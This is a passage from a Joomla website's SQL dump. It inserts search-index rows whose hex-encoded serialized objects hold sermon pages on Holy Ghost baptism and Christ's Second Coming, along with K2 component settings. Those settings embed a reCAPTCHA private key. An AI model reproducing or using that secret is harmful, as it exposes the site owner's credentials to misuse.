3a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33353a22393a686f772d746f2d726563656976652d686f6c792d67686f73742d6261707469736d223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35333a22636f6d706f6e656e742f6b322f6974656d2f392d686f772d746f2d726563656976652d686f6c792d67686f73742d6261707469736d223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d39223b733a353a22726f757465223b733a37323a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d393a686f772d746f2d726563656976652d686f6c792d67686f73742d6261707469736d223b733a353a227469746c65223b733a33333a22486f7720746f205265636569766520486f6c792047686f7374204261707469736d223b733a31313a226465736372697074696f6e223b733a3337313a222042792061736b696e6720666f722048696d20696e2074686520706c616365206f662070726179657220692e652e20796f7520706572736f6e616c6c79206465736972652048696d2c20796f75206861766520746f20756e6465727374616e642074686174207468652070726f6d697365206f662074686520486f6c792047686f7374206973206d65616e7420666f7220796f7520616e6420796f7572206368696c6472656e20284163747320323a3339292e205969656c64696e6720796f757273656c6620746f2074686520486f6c792047686f73742c2074686520706f776572206f6620476f6420697320676f696e6720746f20636f6d652075706f6e20796f7520616e6420796f752077696c6c20626567696e20746f20737065616b20696e20746f6e677565732c207768696368206973207468652065766964656e6365206f662074686520486f6c792047686f7374206261707469736d2e204163747320323a312d342c2031303a34342d34362e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031362d31322d33312032313a34373a3433223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031362d31322d33312032313a34373a3433223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(235, 'index.php?option=com_k2&view=item&id=14', 'index.php?option=com_k2&view=item&id=14:the-hope-of-christ-s-second-coming', 'The Hope of Christ\'s Second Coming', ' TEXT: Rev 1:7-9, Acts 1:9-11: “And to wait for his Son from heaven, whom he raised from the dead, even Jesus, which delivered us from the wrath to come.”1 Thessalonians 1:10 In our text above, Paul was re-enacting their hopes in the second coming of the Lord. He admonished the Church to wait for Him. It is interesting to know that Jesus is still coming back. ', '2017-06-25 14:18:19', '2f3e03acb575e2d8d829e8eaf27efe3a', 1, 1, 1, '*', '2017-01-07 22:03:01', '0000-00-00 00:00:00', '2017-01-07 22:03:01', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223134223b733a353a22616c696173223b733a33343a227468652d686f70652d6f662d6368726973742d732d7365636f6e642d636f6d696e67223b733a373a2273756d6d617279223b733a3338333a223c703e544558543a2052657620313a372d392c204163747320313a392d31313a20e2809c416e6420746f207761697420666f722068697320536f6e2066726f6d2068656176656e2c2077686f6d206865207261697365642066726f6d2074686520646561642c206576656e204a657375732c2077686963682064656c6976657265642075732066726f6d2074686520777261746820746f20636f6d652ee2809d31205468657373616c6f6e69616e7320313a3130c2a03c2f703e0d0a3c703e496e206f757220746578742061626f76652c205061756c207761732072652d656e616374696e6720746865697220686f70657320696e20746865207365636f6e6420636f6d696e67206f6620746865204c6f72642e2048652061646d6f6e6973686564207468652043687572636820746f207761697420666f722048696d2e20497420697320696e746572657374696e6720746f206b6e6f772074686174204a65737573206973207374696c6c20636f6d696e67206261636b2e3c2f703e0d0a223b733a343a22626f6479223b733a323634383a220d0a3c703e4f757220686f7065206973206e6f74206120686f70656c65737320686f70652e20596f7520646f6ee28099742074656c6c20736f6d656f6e6520746f2077616974206e6565646c6573736c79206f7220656e646c6573736c7920666f7220736f6d65626f6479207468617420796f7520617265206e6f74207375726520696620686520697320636f6d696e67206f72206e6f742e205468652073746174656d656e742074686174205061756c206d6164652077617320626f726e206f7574206f6620686973206465657020636f6e76696374696f6e2074686174204a6573757320697320636f6d696e6720616761696e2e3c2f703e0d0a3c703e4a6573757320697320636f6d696e67206261636b206173206865206c65667420696e20706879736963616c20666f726d2c20e2809c616c6c207468652065796573207368616c6c207365652068696de2809d2e205468657265206d61792062652074726962756c6174696f6e2062757420696e20616c6c2074686973207765206d757374206c6561726e2070617469656e6365207468617420476f6420686173206e6f74206162616e646f6e65642075732e205374616e64696e672062792074686520776f7264206f6620476f6420616e642074657374696d6f6e79206f66204a657375732043687269737420657370656369616c6c7920696e207468657365206c61737420646179732077696c6c206365727461696e6c79206272696e67206f70706f736974696f6e20616e642074726962756c6174696f6e2e3c2f703e0d0a3c703e546865726520617265207175657374696f6e7320746861742077696c6c2064657465726d696e6520746865207374617465206f66206f757220686f706520666f722074686520636f6d696e67206f66204368726973743a3c2f703e0d0a3c6f6c3e0d0a3c6c693e5768617420697320796f75722070726573656e74207374617475732061732062656c6965766572733f205468657265206973206120636f6e646974696f6e207468617420796f75206d757374206272696e6720796f757273656c6620696e746f20696620796f752061726520686f70696e6720666f722048696d2e205768793f20426563617573652074686572652069732061207374617465204865e280997320657870656374696e6720796f7520746f20626520696e20746f2062652061636365707461626c652e20416e642065766572796f6e652077686f20686173207468697320686f7065205b72657374696e675d206f6e2048696d20636c65616e73657320287075726966696573292068696d73656c66206a757374206173204865206973207075726520286368617374652c20756e646566696c65642c206775696c746c657373292e2031204a6f686e20333a3328416d70292e2045766572796f6e65207468617420697320686f70696e6720666f722074686520636f6d696e67206d757374206c6976652072656164792c20696e20737563682061207761792074686174207768656e20746865204c6f726420636f6d657468207368616c6c2066696e642068696d20736f20646f696e67284c756b652031323a3433292e204a65737573206973206e6f7420636f6d696e67206261636b20666f7220746865206261636b736c69646572732c204865e2809973206e6f7420636f6d696e67206261636b20666f7220746865206879706f63726974652c20616e64204865e2809973206e6f7420636f6d696e67206261636b20666f722074686f7365206c6976696e6720696e2073696e2e20486520697320636f6d696e67206261636b20666f7220746865207361696e74733c2f6c693e0d0a3c6c693e486f7720646f20796f752072656c617465207769746820746865207265616c697479206f662074686520656e642d74696d653f20546865206d616a6f7220646973706172697479206265747765656e20612043687269737469616e20616e6420616e20756e62656c696576657220697320696e2074686520686f706566756c6e6573732074686174206f6e65206461792c20736f6f6e6572206f72206c617465722c204368726973742077696c6c20636f6d6520666f722075732e20e2809c546865726520697320686f706520696e206f75722066757475726520616e642074686572652069732066757475726520696e206f757220686f7065e2809d2e20416e20756e62656c696576657220697320736f6d65686f7720686f70656c65737320283120436f722e20313a31372d31382c20325468657320333a35292e204c6976696e672077697468207468697320636f6e7363696f75736e657373206d616b657320796f7520696e736570617261626c652066726f6d20746865206c6f7665206f66204368726973742028526f6d616e7320383a33352d333929c2a03c2f6c693e0d0a3c2f6f6c3e0d0a3c703e4e6f7720696620746865206d696e697374726174696f6e206f6620636f6e64656d6e6174696f6e20626520676c6f72792c206d756368206d6f726520646f746820746865206d696e697374726174696f6e206f66207269676874656f75736e6573732065786365656420696e20676c6f72792e20496620696e20746865204f6c642054657374616d656e74207768696368206973206120736861646f77206f6620746865206e65772c2070757269747920616e6420686f6c696e6573732069732061207374616e646172642c206d756368206d6f72652069732070757269747920616e6420686f6c696e6573732064656d616e646564206f662074686520636875726368206f66204a65737573204368726973742e2054686973206973207768792043687269737420676176652068696d73656c6620666f7220746865206368757263682c20e2809c74686174206865206d696768742073616e637469667920616e6420636c65616e73652069742077697468207468652077617368696e67206f662077617465722062792074686520776f72642c2074686174206865206d696768742070726573656e7420697420746f2068696d73656c66206120676c6f72696f7573206368757263682c206e6f7420686176696e672073706f742c206f72207772696e6b6c652c206f7220616e792073756368207468696e673b206275742069732073686f756c6420626520686f6c7920616e6420776974686f757420626c656d6973682e20457068657369616e7320353a32362d32362e3c2f703e0d0a3c703e4c6574206576657279206d656d626572206f662074686520636875726368206f6620436872697374207468657265666f7265207374616e64206279207468652061646d6f6e6974696f6e2c20e28098746f20746f756368206e6f742074686520756e636c65616e207468696e67e2809d2e204f757220686f7065206f662077616974696e6720666f7220686973207365636f6e6420636f6d696e6720697320776f7274682077616974696e6720666f722c204c69766520657665727964617920776974682074686520636f6e7363696f75736e6573732074686174206f7572204c6f72642077696c6c20736f6f6e2072657475726e2e3c2f703e0d0a3c703e4c6976652072656164792c204c69766520686f6c7920616e64204c69766520707572652e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d31352030363a33353a3330223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c2